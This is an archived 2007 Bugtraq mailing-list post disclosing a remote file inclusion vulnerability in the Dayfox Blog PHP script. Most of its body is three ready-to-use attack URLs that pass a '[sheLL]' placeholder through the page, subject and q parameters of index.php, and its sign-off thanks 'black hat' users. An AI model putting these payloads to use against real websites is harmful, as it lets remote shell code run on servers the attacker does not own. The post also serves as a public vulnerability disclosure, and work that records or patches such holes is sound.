Dayfox Blog Remote File Include Vuln.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Dayfox Blog Remote File Include Vuln.
From: ShaFuq31@xxxxxxxxxxx
Date: 7 Jan 2007 14:13:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Dayfox Blog

# Script Download : http://hotscripts.com/Detailed/66344.html

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

#Vuln :
http://www.victim.com/ScriptPath/index.php?page=[sheLL]
http://www.victim.com/ScriptPath/index.php?subject=[sheLL]
http://www.victim.com/ScriptPath/index.php?q=[sheLL]

# Thanks : 4LL bL4ck h4t us3rs & my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Prev by Date: Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous
Next by Date: Re: Perforce client: security hole by design
Previous by thread: [SECURITY] [DSA 1245-1] New proftpd packages fix denial of service
Next by thread: GeoBB Georgian Bulletin Board Remote File Include Vuln.
Index(es):
- Date
- Thread